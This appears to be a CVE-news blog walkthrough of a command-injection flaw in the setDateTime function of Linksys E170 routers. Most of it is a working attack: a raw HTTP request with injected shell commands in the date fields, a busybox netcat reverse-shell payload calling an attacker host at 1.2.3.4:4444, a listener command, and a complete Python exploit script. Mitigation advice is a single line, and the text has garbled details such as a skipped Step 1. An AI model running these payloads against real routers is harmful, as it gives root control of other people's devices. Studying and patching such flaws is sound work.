CVE CyberSecurity Database News

CVE-2024-22544 - Critical RCE in Linksys E170 Routers Via the setDateTime Function (Exploit Walkthrough & Code Samples)

Poster -

In early 2024, security researchers uncovered a serious flaw in the Linksys E170 router, version 1..04 (build 3). This vulnerability, tracked as CVE-2024-22544, allows any authenticated user to run their own commands on the router by abusing the setDateTime function. Sound confusing? Let’s break it down with simple language, code snippets, exploit details, and reference links.

Technical Overview

The router’s web admin panel provides a function to set the device’s internal date and time. When you set these fields, the router builds a command and runs it on the underlying Linux system. The problem? The setDateTime function doesn’t properly sanitize (clean up) the input. An attacker can inject Linux commands inside the date string.

How It Works

When an authenticated user sends their chosen date and time via HTTP POST to the router’s admin backend, the code behind setDateTime does something like:

system("date " + user_supplied_input);

There’s little to no validation. This means you can slip shell metacharacters (; && ||) and sneak in extra commands.

Step 2: Find the setDateTime Request

Go to the router’s web admin UI, under time or date settings. With your browser’s dev tools or Burp Suite (a proxy tool), capture the request when you hit ‘Save’ on the date settings.

The request is usually POST to a path like /apply.cgi or /setDateTime, with parameters like

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
Cookie: session=YOUR_SESSION_ID
Content-Type: application/x-www-form-urlencoded

submitType=date_set&sysYear=2024&sysMonth=06&sysDay=10&sysHour=12&sysMinute=00&sysSecond=00

Step 3: Inject Code in the Date Field

These fields (sysYear, sysMonth, etc.) get passed straight to the OS command. Let’s try adding a payload.

Malicious Example:
Set sysHour to 12;touch /tmp/hax;#

Resulting data

sysHour=12;touch /tmp/hax;#

The router will run

date ... 12;touch /tmp/hax;# ...
# 'touch /tmp/hax' creates a marker file, but you can run any command

Step 4: Get a Reverse Shell (Proof-of-Concept)

If you control a server at 1.2.3.4:4444, you can force the router to connect back and give you a remote shell. Example (using busybox):

Set a time field to

12;busybox nc 1.2.3.4 4444 -e sh;#

Start a netcat listener on your machine

nc -lvnp 4444

When the router processes the request, your listener gets a shell session from the router (as root).

Example Exploit Code (Python)

Below is a simple Python3 proof-of-concept to exploit CVE-2024-22544. Update your target IP, password, and attacker IP.

import requests

ROUTER_HOST = "http://192.168.1.1";
USERNAME = "admin"
PASSWORD = "yourpassword"
ATTACKER_IP = "1.2.3.4"
ATTACKER_PORT = "4444"

login = requests.Session()

# 1. Authenticating (may differ per router; you may need to fetch CSRF tokens etc.)
creds = {
    "login_username": USERNAME,
    "login_password": PASSWORD
}
login.post(f"{ROUTER_HOST}/login.cgi", data=creds)

# 2. Exploit the setDateTime function
payload = f"12;busybox nc {ATTACKER_IP} {ATTACKER_PORT} -e sh;#"

data = {
    "submitType": "date_set",
    "sysYear": "2024",
    "sysMonth": "06",
    "sysDay": "10",
    "sysHour": payload,
    "sysMinute": "00",
    "sysSecond": "00"
}

r = login.post(f"{ROUTER_HOST}/apply.cgi", data=data)
print(f"Status: {r.status_code}")

Note: You'll need to figure out exact request/response for your router and login process.

References and Original Sources

- CVE Record for CVE-2024-22544 (NVD)
- Full Disclosure Mailing List Advisory
- Linksys E170 Support Page
- Exploit Database PoC (if published)

Linksys has not (yet) published an official patch. Until they do, you should

- Restrict router access: Only wired/trusted computers can access the admin interface

TL;DR

CVE-2024-22544 lets anyone logged in to a Linksys E170 router run system commands by sending a malicious date. An attacker gets full control over the device—even with just ordinary admin login. If you use this router, lock it down now.


Stay safe!
For feedback or detailed exploit steps, check the references or contact security researchers tracking this bug.

Timeline

Published on: 02/27/2024 01:15:07 UTC
Last modified on: 08/01/2024 13:46:59 UTC